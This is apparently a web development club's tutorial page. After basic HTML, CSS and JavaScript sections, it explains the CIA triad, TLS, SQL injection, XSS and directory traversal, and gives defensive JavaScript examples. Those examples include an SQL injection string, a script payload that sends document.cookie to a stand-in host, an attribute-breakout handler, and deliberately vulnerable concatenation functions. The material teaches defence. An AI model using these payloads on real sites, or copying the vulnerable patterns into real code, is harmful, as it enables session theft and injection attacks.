Web Development Club

Learn how to develop your own website that interacts with internal and external resources.

What Makes a Website

...

HTML5

HTML (HyperText Markup Language) is a descriptive language that specifies webpage structure.

...

CSS

CSS (Cascading Style Sheets) is a declarative language that controls how webpages look in the browser.

...

JavaScript

JavaScript (or "JS") is a programming language used most often for dynamic client-side scripts on webpages.

...

Cybersecurity

Cybersecurity is the art of protecting networks, devices, and data from unauthorized access or criminal use and the practice of ensuring confidentiality, integrity, and availability of information.

Cybersecurity

When speaking of cybersecurity it is important to remember Confidentiality, Integrity, and Availability, also known as the CIA triad. Understanding the CIA triad will help you write policies for your website and keep a security mindset while developing it. So let's go through the CIA triad.

- Confidentiality: Confidentiality means making sure that sensitive data is not read by unauthorized individuals. When thinking about confidentiality, ask how you can secure the data on your website: who is allowed to see each piece of it, and how you keep everyone else from seeing it.

- Integrity: Integrity lets the user know that the information can be trusted. It means making sure that the data you store, and the data you pass back to the user, has not been altered, whether by accident or by an attacker. Many attackers will try to manipulate the data your website sends so that they can steal other users' personal information.

- Availability: Without availability your website serves no purpose. Availability means making sure your data is reachable by authorized users when they need it. If a user goes to your site and logs in, they should be able to access their information as long as they are properly authenticated.

SSL (today its successor, TLS) gives a website a good layer of security. Say you are passing data back and forth between the server hosting your website and the computer you are visiting it from. You want to make sure that the data passed back and forth cannot be read or modified on the way, and SSL/TLS provides that. The server presents a certificate issued by a certificate authority (CA). When you visit an HTTPS website, the browser checks that the certificate was issued by a CA it trusts and that it matches the site's domain name; the two sides then agree on keys and encrypt the connection. This makes it very hard for attackers on the network to read or tamper with the traffic. One caveat: HTTPS protects data in transit only. It does nothing against the SQL injection, XSS, and directory traversal attacks described below, which travel through the encrypted channel just as well as legitimate requests do.

Before we discuss SQL injection, let's discuss what SQL is. SQL is Structured Query Language, a language used to define, query, and manipulate databases. Many websites use databases, and one of the most common reasons is to hold user accounts, the same accounts you use to log in to a website. So what is SQL injection? SQL injection is an attack in which a user sends malicious SQL from the website to the database so that it runs as part of the application's own query and manipulates the database. It is easily done by typing SQL into a login form on a website: instead of a username and password, the attacker types a string of SQL that changes the meaning of the query the application builds from that input, for example turning the WHERE clause into one that is always true. SQL injection does not have to come from a form. It can also happen when the attacker types a web address into the browser and adds SQL to a parameter in that address, because the server may place that value straight into a query.

Best ways to defend against it:

Input validation: check user input against what you expect (for example, a user ID must be a number, a username must be made of letters and digits) so that malicious SQL is not passed through. Validation alone is not enough, though: the primary defense is parameterized queries (prepared statements), which send the SQL text and the user's values to the database separately, so the values can never be interpreted as SQL.

Firewalls: a web application firewall can filter out known SQL injection patterns as well as other dangerous forms of attack. Treat it as an extra layer rather than a fix for the code, since attackers often find encodings that a filter does not recognize.
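The following JavaScript (Node.js) example is added here and is not the club's own code. It contrasts the vulnerable way of building a login query by string concatenation with a parameterized query whose SQL text never changes, and adds the input validation described above for both a form field and an address-bar parameter. The table and column names (users, username, password_hash), the validation rules, and the inputs are assumptions made for the example; a real login would compare a password hash, not the raw password.

```javascript
// Added example (not from the original page). Table/column names and the
// validation rules are assumptions chosen for illustration.

// VULNERABLE: user input is pasted straight into the SQL text, so a quote in
// the input ends the string literal and the rest becomes SQL the attacker wrote.
function buildLoginQueryUnsafe(username, password) {
  return "SELECT id FROM users WHERE username = '" + username +
         "' AND password_hash = '" + password + "'";
}

// SAFE: the SQL text is fixed. The values travel separately as parameters,
// which the database driver binds as data and never interprets as SQL.
function buildLoginQuerySafe(username, password) {
  return {
    sql: 'SELECT id FROM users WHERE username = ? AND password_hash = ?',
    params: [username, password],
  };
}

// Input validation for the form: allowlist of letters, digits, '_' and '.',
// 3 to 32 characters. Anything else (including quotes) is refused.
function isValidUsername(username) {
  return /^[A-Za-z0-9_.]{3,32}$/.test(String(username));
}

// Input validation for an address-bar parameter such as /product?id=42.
// An id must be plain digits; "1 OR 1=1" is rejected before it reaches SQL.
function parseIdParam(url) {
  const id = new URL(url, 'http://localhost').searchParams.get('id');
  if (id === null || !/^\d{1,10}$/.test(id)) return null;
  return Number(id);
}

// Request handler shape: validate first, then only ever use the safe builder.
function handleLogin(username, password) {
  if (!isValidUsername(username)) return { ok: false, reason: 'invalid username' };
  return { ok: true, query: buildLoginQuerySafe(username, password) };
}

// Constructed attacker input: closes the username literal and appends an
// always-true condition (a classic, widely documented payload).
const SAMPLE_INJECTION = "' OR '1'='1";
```

Comparing `buildLoginQueryUnsafe(SAMPLE_INJECTION, 'x')` with `buildLoginQuerySafe(SAMPLE_INJECTION, 'x')` shows the difference: the first produces a statement whose WHERE clause now reads `username = '' OR '1'='1' AND ...`, while the second returns exactly the same `sql` string it returns for a benign username, with the payload sitting harmlessly in `params`.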

Cross Site Scripting, also known as XSS, can be carried out with several languages, the most common being JavaScript. XSS is similar to SQL injection in that an attacker submits malicious content to the website, but here the content is script that runs in other users' browsers rather than SQL that runs in the database. Attackers do this to steal session cookies and passwords, log keystrokes, capture financial information, and much more. So how does it work? The attacker submits JavaScript to the website through something like a comment field or a link parameter, and the website includes that text in a page without escaping it. When another user views the page, their browser executes the script, and that user has become a victim of cross site scripting. The victim's information is then stolen and used against them.

Ways to defend against it:

Input validation: check user input against what you expect so that script is not accepted where it does not belong (a field that should hold a name should not accept angle brackets).

Firewalls: a web application firewall can filter out and block common XSS payloads, though as with SQL injection it is a backstop rather than a fix for the code.

Escaping (output encoding): rather than deleting characters, escaping converts the characters that have special meaning in HTML, JavaScript, CSS, or URLs (such as `<`, `>`, `&`, `"`, and `'`) into their encoded forms (`&lt;`, `&gt;`, `&amp;`, `&quot;`, `&#39;`) at the point where user data is written into the page. The browser then displays the data as text instead of running it. Escape for the context the data lands in: text inside an HTML attribute needs different treatment than text in a URL or inside a script block.
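The following JavaScript example is added here and is not the club's own code. It renders a comment into HTML first without escaping (vulnerable) and then with escaping for the HTML text and attribute contexts, and includes a small tag scanner, written for this example only, that reports script tags and `on*` event handler attributes so the two outputs can be compared. The markup template, the attacker inputs, and the `attacker.invalid` hostname are constructed for the example.

```javascript
// Added example (not from the original page). Template, payloads and the
// scanner are assumptions made for illustration.

const ESCAPE_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can change meaning in HTML text or inside a
// quoted attribute. The browser renders the result as literal characters.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPE_MAP[ch]);
}

// VULNERABLE: user content is concatenated straight into the markup, so a
// quote in `author` escapes the attribute and a tag in `text` becomes a tag.
function renderCommentUnsafe(author, text) {
  return `<div class="comment" data-author="${author}"><p>${text}</p></div>`;
}

// HARDENED: every user-controlled value is escaped where it is inserted.
function renderCommentSafe(author, text) {
  return `<div class="comment" data-author="${escapeHtml(author)}"><p>${escapeHtml(text)}</p></div>`;
}

// Minimal tag scanner (not a full HTML parser): returns opening tags with
// their attribute names, skipping over quoted attribute values the way a
// browser does, so text that merely looks like an attribute is not counted.
function scanTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    let j = i + 1;
    let closing = false;
    if (html[j] === '/') { closing = true; j++; }
    const nameStart = j;
    while (j < html.length && /[A-Za-z0-9-]/.test(html[j])) j++;
    const name = html.slice(nameStart, j).toLowerCase();
    if (!name) { i++; continue; }                 // a bare '<' is just text
    const attrs = [];
    while (j < html.length && html[j] !== '>') {
      if (/[\s\/]/.test(html[j])) { j++; continue; }
      const attrStart = j;
      while (j < html.length && !/[\s=>\/]/.test(html[j])) j++;
      attrs.push(html.slice(attrStart, j).toLowerCase());
      while (j < html.length && /\s/.test(html[j])) j++;
      if (html[j] === '=') {
        j++;
        while (j < html.length && /\s/.test(html[j])) j++;
        const q = html[j];
        if (q === '"' || q === "'") {             // quoted value: jump to its end
          const end = html.indexOf(q, j + 1);
          j = end === -1 ? html.length : end + 1;
        } else {
          while (j < html.length && !/[\s>]/.test(html[j])) j++;
        }
      }
    }
    if (!closing) tags.push({ name, attrs });
    i = j + 1;
  }
  return tags;
}

// List the active content an injected payload would introduce.
function findActiveContent(html) {
  const findings = [];
  for (const tag of scanTags(html)) {
    if (tag.name === 'script') findings.push('<script> tag');
    for (const a of tag.attrs) {
      if (a.startsWith('on')) findings.push(`${a} handler on <${tag.name}>`);
    }
  }
  return findings;
}

// Constructed attacker inputs: one aimed at the text context, one that breaks
// out of the data-author attribute to add an event handler.
const SAMPLE_TEXT_PAYLOAD = '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>';
const SAMPLE_ATTR_PAYLOAD = '" onmouseover="alert(1)';
```

Run `findActiveContent` on both renderings: the unsafe one yields an `onmouseover` handler on the div and a script tag, the safe one yields nothing, and the escaped page still shows the attacker's text verbatim as text.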

Directory traversal, also known as path traversal, lets an attacker read files of their choice on the server. Think of it this way: an attacker looks at a web address and sees that the website loads an item such as an image from a path given in the URL. The attacker then replaces that path with one of their own using `../`, which moves up one directory each time it is repeated, until they have climbed out of the directory the images live in and can reach the rest of the file system. From there they can read whatever the web server process has permission to read: configuration files holding database credentials, application source code, or any other information that helps them attack the site or its users. If the application also writes files to a user-controlled path, the attacker may be able to write a file of their own containing code that changes application data and behavior.

Ways to defend against it:

Input validation: check the user-supplied file name so that it cannot contain path separators or `..` segments, and, after resolving it against the intended directory, confirm that the resulting path is still inside that directory. Remember that the server may decode `%2e%2e%2f` into `../` before using it, so apply the check to the decoded value.

Change where documents are located: keep user-served files on a separate partition or file server, and run the web server with the least privilege it needs, so that even a successful traversal reaches as little as possible.